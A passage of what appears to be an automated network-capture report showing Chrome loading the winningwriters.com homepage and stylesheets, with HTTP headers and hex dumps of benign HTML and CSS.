                                                                                                                                                                                            Data Ascii: Root Entry
                                                                                                                                                                                            Nov 18, 2024 21:01:18.062206984 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 18 00 00 00 00 00 00 00 40 48 ca 41 30 43
                                                                                                                                                                                            Data Ascii: @HA0C??(E8BA(H@HA0C;;B&F7BB4FhD&B
                                                                                                                                                                                            Nov 18, 2024 21:01:18.062246084 CET1236INData Raw: 36 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii: 6H4@H?;C8DE58


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.164970166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:01 UTC661OUTGET / HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:03 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:02 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Set-Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; secure; HttpOnly
                                                                                                                                                                                            Set-Cookie: exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; path=/; secure; HttpOnly; SameSite=Lax
                                                                                                                                                                                            Set-Cookie: exp_csrf_token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; secure; HttpOnly; SameSite=Lax
                                                                                                                                                                                            Set-Cookie: exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; expires=Mon, 18-Nov-2024 22:00:02 GMT; Max-Age=7200; path=/; secure; HttpOnly; SameSite=Lax
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 20:00:03 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
                                                                                                                                                                                            Content-Length: 39765
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            2024-11-18 20:00:03 UTC7151INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 70 61 75 6c 69 72 69 73 68 2e 63 6f 6d 2f 32 30 30 38 2f 63 6f 6e 64 69 74 69 6f 6e 61 6c 2d 73 74 79 6c 65 73 68 65 65 74 73 2d 76 73 2d 63 73 73 2d 68 61 63 6b 73 2d 61 6e 73 77 65 72 2d 6e 65 69 74 68 65 72 2f 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e
                                                                                                                                                                                            Data Ascii: <!DOCTYPE html>... paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]-->
                                                                                                                                                                                            2024-11-18 20:00:03 UTC201INData Raw: 22 2f 6d 65 74 61 2d 6e 61 76 2f 68 65 6c 70 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 65 74 61 2d 6e 61 76 2f 61 64 76 65 72 74 69 73 65 22 3e 41 64 76 65 72 74 69 73 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 61 73 74 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 65 74 61 2d 6e 61 76 2f 6f 75 72 2d 73 70 6f 6e 73 6f 72 73 22 3e 4f 75 72 20 53 70 6f 6e 73 6f 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 0a 09 09 09 09 0a 09 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 65 74 61 2d 6e 61 76 2f 6c 6f 67 69 6e 22 3e 6c 6f 67 69
                                                                                                                                                                                            Data Ascii: "/meta-nav/help">Help</a></li><li><a href="/meta-nav/advertise">Advertise</a></li><li class="last"><a href="/meta-nav/our-sponsors">Our Sponsors</a></li> <li><a href="/meta-nav/login">logi
                                                                                                                                                                                            2024-11-18 20:00:03 UTC8192INData Raw: 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 2d 6e 61 76 69 67 61 74 69 6f 6e 20 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 20 74 77 69 74 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 78 2e 63 6f 6d 2f 77 69 6e 6e 69 6e 67 77 72 69 74 65 72 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 54 77 69 74 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 20 66 61 63 65 62 6f 6f 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 61 67 65 73 2f 57 69 6e 6e 69 6e 67 2d 57 72 69 74 65 72 73
                                                                                                                                                                                            Data Ascii: n</a></li></ul><ul class="social-navigation navigation"><li class="social twitter"><a href="https://x.com/winningwriters" target="_blank">Twitter</a></li><li class="social facebook"><a href="https://www.facebook.com/pages/Winning-Writers
                                                                                                                                                                                            2024-11-18 20:00:03 UTC8192INData Raw: 72 73 2d 6e 65 77 73 6c 65 74 74 65 72 22 3e 46 72 65 65 20 57 69 6e 6e 69 6e 67 20 57 72 69 74 65 72 73 20 4e 65 77 73 6c 65 74 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 74 68 65 2d 62 65 73 74 2d 66 72 65 65 2d 6c 69 74 65 72 61 72 79 2d 63 6f 6e 74 65 73 74 73 2f 63 6f 6e 74 65 73 74 73 2d 74 6f 2d 61 76 6f 69 64 22 3e 43 6f 6e 74 65 73 74 73 20 61 6e 64 20 53 65 72 76 69 63 65 73 20 74 6f 20 41 76 6f 69 64 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 72 65 73 6f 75 72 63 65 73 22 3e 52 65 73 6f 75 72 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 68 61 74 73 2d 6e 65 77 22 3e 57 68 61 74 26 23 30 33 39 3b 73 20 4e
                                                                                                                                                                                            Data Ascii: rs-newsletter">Free Winning Writers Newsletter</a></li><li><a href="/the-best-free-literary-contests/contests-to-avoid">Contests and Services to Avoid</a></li></ul></li><li><a href="/resources">Resources</a></li><li><a href="/whats-new">What&#039;s N
                                                                                                                                                                                            2024-11-18 20:00:03 UTC8192INData Raw: 09 09 09 09 09 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 70 6f 70 75 6c 61 72 2d 69 74 65 6d 20 2d 2d 3e 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 6c 61 72 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 3c 68 34 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 6e 69 6e 67 77 72 69 74 65 72 73 2e 63 6f 6d 2f 6f 75 72 2d 63 6f 6e 74 65 73 74 73 22 3e 4f 75 72 20 43 6f 6e 74 65 73 74 73 3c 2f 61 3e 3c 2f 68 34 3e 0a 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 63 6f 6d 69 63 22 3e 0a 09 09 09 09 09 09 09 09 09 57 65 72 67 6c 65 20 46 6c 6f 6d 70 20 48 75 6d 6f 72 20 50 6f 65 74 72 79 20 43 6f 6e 74 65 6e 74 20 28 6e 6f 20 66 65 65 29 3c 62 72 3e 0a 09 09 09 09 09 09 09 09
                                                                                                                                                                                            Data Ascii: </div>... /.popular-item --><div class="popular-item"><h4><a href="https://winningwriters.com/our-contests">Our Contests</a></h4><p class="comic">Wergle Flomp Humor Poetry Content (no fee)<br>
                                                                                                                                                                                            2024-11-18 20:00:03 UTC7832INData Raw: 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6a 73 2f 67 61 2d 74 72 61 63 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6a 73 2f 68 6f 76 65 72 69 6e 74 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 63 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f
                                                                                                                                                                                            Data Ascii: pt><script type="text/javascript" src="/assets/js/ga-track.js"></script><script type="text/javascript" src="/assets/js/hoverintent.js"></script><script type="text/javascript" src="/assets/js/jquery-ck.js"></script><script type="text/javascript" src="/
                                                                                                                                                                                            2024-11-18 20:00:03 UTC5INData Raw: 6d 6c 3e 0a 0a
                                                                                                                                                                                            Data Ascii: ml>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.164970366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC824OUTGET /assets/css/style.css HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "bc71-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 48241
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                            2024-11-18 20:00:04 UTC7832INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 61 6c 65 77 61 79 3a 77 67 68 74 40 34 30 30 3b 37 30 30 7c 4c 6f 72 61 3a 34 30 30 2c 37 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 26 64 69 73 70 6c 61 79 3d 73 77 61 70 29 3b 0a 61 2c 0a 61 62 62 72 2c 0a 61 63 72 6f 6e 79 6d 2c 0a 61 64 64 72 65 73 73 2c 0a 61 70 70 6c 65 74 2c 0a 61 72 74 69 63 6c 65 2c 0a 61 73 69 64 65 2c 0a 61 75 64 69 6f 2c 0a 62 2c 0a 62 69 67 2c 0a 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 62 6f 64 79 2c 0a 63 61 6e 76 61 73 2c 0a 63 61 70 74 69 6f 6e 2c 0a 63 65 6e 74 65 72 2c 0a 63 69 74 65 2c 0a 63 6f 64 65 2c 0a 64 64 2c 0a 64 65 6c 2c 0a 64 65 74 61 69 6c 73 2c 0a 64
                                                                                                                                                                                            Data Ascii: @import url(//fonts.googleapis.com/css?family=Raleway:wght@400;700|Lora:400,700,400italic,700italic&display=swap);a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,d
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 72 2c 0a 23 6e 61 76 2d 73 75 62 20 6c 69 2e 70 61 72 65 6e 74 2d 68 65 72 65 2c 0a 23 6e 61 76 2d 73 75 62 20 6c 69 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 63 33 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 23 6e 61 76 2d 73 75 62 20 6c 69 20 75 6c 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 63 33 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 2e 32 35 65 6d 20 33 2e 31 32 35 65 6d 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 2e 39 33 37 35 65 6d 3b 0a 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20
                                                                                                                                                                                            Data Ascii: r,#nav-sub li.parent-here,#nav-sub li:hover { background: #c30; color: #fff; position: relative;}#nav-sub li ul { background: #c30; padding: 0 1.25em 3.125em; width: 10.9375em; visibility: hidden; position: absolute;
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 64 67 65 74 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 7d 0a 0a 2e 77 69 64 67 65 74 20 2e 74 77 65 65 74 73 20 70 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 2e 35 65 6d 3b 0a 20 20 20 20 63 6c 65 61 72 3a 62 6f 74 68 3b 0a 7d 0a 0a 2e 77 69 64 67 65 74 20 2e 74 77 65 65 74 73 20 69 6d 67 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 2e 31 32 35 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 0a 2e 77 69 64 67 65 74 74 69 74 6c 65 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 2e 35 35 35 35 35 35 35 35 35 36 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65
                                                                                                                                                                                            Data Ascii: dget p { font-size: 13px; margin: 0 0; line-height: 1.5;}.widget .tweets p { margin-bottom: 2.5em; clear:both;}.widget .tweets img {margin-bottom:2.125em !important;}.widgettitle { padding-bottom: .5555555556em; font-we
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 6f 6e 20 70 2e 6c 65 61 72 6e 6d 6f 72 65 20 61 3a 61 63 74 69 76 65 2c 20 0a 2e 61 64 2e 72 73 6c 69 64 65 73 20 2e 63 61 70 74 69 6f 6e 20 68 32 20 61 3a 6c 69 6e 6b 2c 20 0a 2e 72 73 6c 69 64 65 73 20 2e 63 61 70 74 69 6f 6e 20 68 32 2c 0a 2e 68 6f 6d 65 20 2e 73 75 62 73 63 72 69 62 65 20 73 70 61 6e 2c 20 0a 2e 61 64 2e 68 6f 6d 65 20 2e 73 75 62 73 63 72 69 62 65 20 2e 61 6c 72 65 61 64 79 2d 73 75 62 73 63 72 69 62 65 64 20 61 3a 6c 69 6e 6b 2c 0a 2e 68 6f 6d 65 20 2e 73 75 62 73 63 72 69 62 65 20 2e 61 6c 72 65 61 64 79 2d 73 75 62 73 63 72 69 62 65 64 20 61 3a 76 69 73 69 74 65 64 2c 0a 2e 72 73 6c 69 64 65 73 20 2e 63 61 70 74 69 6f 6e 20 70 2e 6c 65 61 72 6e 6d 6f 72 65 20 61 3a 6c 69 6e 6b 2c 20 0a 2e 61 64 2e 68 6f 6d 65 20 2e 6d 61 69 6e 20
                                                                                                                                                                                            Data Ascii: on p.learnmore a:active, .ad.rslides .caption h2 a:link, .rslides .caption h2,.home .subscribe span, .ad.home .subscribe .already-subscribed a:link,.home .subscribe .already-subscribed a:visited,.rslides .caption p.learnmore a:link, .ad.home .main
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 20 20 20 7d 0a 20 20 20 20 2e 68 6f 6d 65 20 2e 73 65 61 6c 20 7b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 2e 31 65 6d 3b 0a 20 20 20 20 7d 0a 7d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 33 36 36 70 78 29 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 31 2e 35 29 7b 0a 20 20 20 20 2e 6e 61 76 62 61 72 20 66 6f 72 6d 20 23 6b 65 79 77 6f 72 64 73 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 34 70 78 3b 0a 20 20 20 20 7d 0a 7d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64
                                                                                                                                                                                            Data Ascii: } .home .seal { line-height: 2.1em; }}@media only screen and (min-width: 1024px) and (max-height: 1366px) and (-webkit-min-device-pixel-ratio: 1.5){ .navbar form #keywords { width: 104px; }}@media screen and (min-wid
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 2e 37 35 65 6d 20 31 2e 33 37 35 65 6d 20 30 0a 20 20 20 20 7d 0a 20 20 20 20 23 69 6e 74 65 72 69 6f 72 20 23 63 6f 6e 74 65 6e 74 20 2e 66 65 61 74 75 72 65 64 2d 63 6f 6e 74 65 6e 74 2d 6e 65 77 20 2e 69 74 65 6d 73 77 72 61 70 20 2e 66 65 61 74 75 72 65 64 2d 69 74 65 6d 2e 66 69 72 73 74 20 7b 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; width: 100%; margin: 0 .75em 1.375em 0 } #interior #content .featured-content-new .itemswrap .featured-item.first {
                                                                                                                                                                                            2024-11-18 20:00:04 UTC409INData Raw: 64 2d 74 6f 70 20 61 2e 63 6f 6e 74 65 6e 74 5f 77 72 61 70 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 75 6e 73 65 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 75 6e 73 65 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2f 2a 0a 63 6f 64 65 20 66 6f 72 20 72 65 73 6f 6c 76 69 6e 67 20 4c 43 50 20 6f 6e 20 6d 6f 62 69 6c 65 20 76 69 65 77 2e 0a 2a 2f 0a 2f 2a 20 53 74 79 6c 65 73 20 66 6f 72 20 61 6c 6c 20 73 63 72 65 65 6e 20 73 69 7a 65 73 20 2a 2f 0a 0a 2f 2a 20 4d 65 64 69 61 20 71 75 65 72 79 20 66 6f 72 20 73 63 72 65 65 6e 73 20 75 70 20 74 6f 20 37 36 37 20 70 69 78 65 6c 73 20 28 74 79 70 69 63 61 6c 6c 79 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 29 20 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68
                                                                                                                                                                                            Data Ascii: d-top a.content_wrap{ width: unset !important; height: unset !important;}/*code for resolving LCP on mobile view.*//* Styles for all screen sizes *//* Media query for screens up to 767 pixels (typically mobile devices) */@media (max-width


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.164970766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC839OUTGET /assets/fancybox/jquery.fancybox.css HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC359INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "1320-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 4896
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                            2024-11-18 20:00:04 UTC4896INData Raw: 2f 2a 21 20 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 20 2a 2f 0a 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 6f 75 74 65 72 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 69 6d 61 67 65 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 69 66 72 61 6d 65 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 6f 62 6a 65 63 74 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 20 73 70 61 6e 2c 0a 2e 66 61 6e 63 79 62 6f 78 2d 74 6d 70 0a 7b 0a 09 70 61 64
